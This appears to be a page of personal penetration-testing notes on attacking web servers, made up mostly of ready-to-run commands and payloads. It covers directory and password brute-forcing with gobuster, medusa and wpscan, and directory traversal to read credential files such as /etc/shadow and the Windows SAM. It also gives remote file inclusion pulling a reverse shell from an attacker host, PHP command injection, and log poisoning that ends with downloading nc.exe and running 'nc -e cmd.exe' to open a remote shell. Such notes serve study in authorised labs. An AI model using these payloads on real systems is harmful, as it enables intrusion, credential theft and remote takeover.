Uncategorized

Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors

dirb http://10.10.1.299

dirb http://10.10.1.299 -P 10.10.1.299:8080 -o file.txt  # USED TO SCAN OTHER PORTS

dirbuster. # GUI USED TO ENUMERATE

gobuster dir -u http://10.10.1.299:8080 -w wordlist.txt
# TAKES A WHILE (220K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# QUICKER (87K words)
 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
# QUICKETS (5K words)
/usr/share/wordlists/dirb/common.txt

medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin

DIRECTORY TRAVERSAL

REMOTE FILE INCLUSION

LOCAL FILE INCLUSION

SQL INJECTION

# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password

DIRECTORY TRAVERSAL

…you may be able to view files on the server
…you’ll traverse file paths using “../../../” to go backward
…then list the location of the file you are trying to read

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

…you can look for very common files on a system

WINDOWS
C:\windows\win.ini 
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab

REMOTE FILE INCLUSION (RFI)

… you may be able to reference a file on your own server via the web request
… look for a page or file request (?page=)
… URL encoding may be done through BurpSuite Decoder

http://10.10.1.299/section.php?page=http://192.168.119.299:443/revshell.php

# EXAMPLE USING ACS WITH ESCAPE PADDING AT THE END
http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http%3A%2F%2F192.168.119.188%3A443%2Fshell.php%00
# EMAPLE USING CURL
curl -s --data "<?system('$CMD');?>" 'http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00'

LOCAL FILE INCLUSION (LFI)

… if you can poison a file on their server, you may be able to use it
… sometimes this works after discovering Directory Traversal
… URL encoding may be done through BurpSuite Decoder

# DIRECTORY TRAVERSAL WORKED
?file=../../../../../../../var/log/httpd/access_log
# SO LFI MAY BY POISONING THE LOG FILES
?file=data:text/plain,<?php echo shell_exec("dir") ?>
?helpfile=../secret/.htpasswd
?download=brochure.pdf
?download=../include/connection.php
# URL ENCODE THROUGH BURPSUITE DECODER
?file=data:text/plain,%3C?php%20echo%20shell_exec(%22id%22)%20?%3E

# MORE LOG POISION TECHNIQUES

# COMMON PADDING
param=../../../../../../etc/passwd%00

# Default Locations
RHEL / Red Hat / CentOS / Fedora Linux Apache log file location   /var/log/httpd/access_log     /var/log/httpd/error_log
Debian / Ubuntu Linux Apache log file location                    /var/log/apache2/access.log   /var/log/apache2/error.log
FreeBSD Apache log file location                                  /var/log/httpd-access.log     /var/log/httpd-error.log

# For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files:
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf

# Windows web roots
C:/xampp/htdocs/
C:/wamp/www/
C:/Inetpub/wwwroot/

# CONNECT AND POISON
$ nc 192.168.1.23 80
<?php echo shell_exec($_GET['cmd']);?>

# USE LANG ATTRIBUTE TO ACCESS LOG
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

# UPLOAD NETCAT WITH TFTP
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=tftp+-i+10.10.10.299+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00

# EXECUTE NETCAT
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=nc.exe+10.10.10.299+80+-e+cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00

RESTART WINDOWS

shutdown /r /t 0
Scroll to top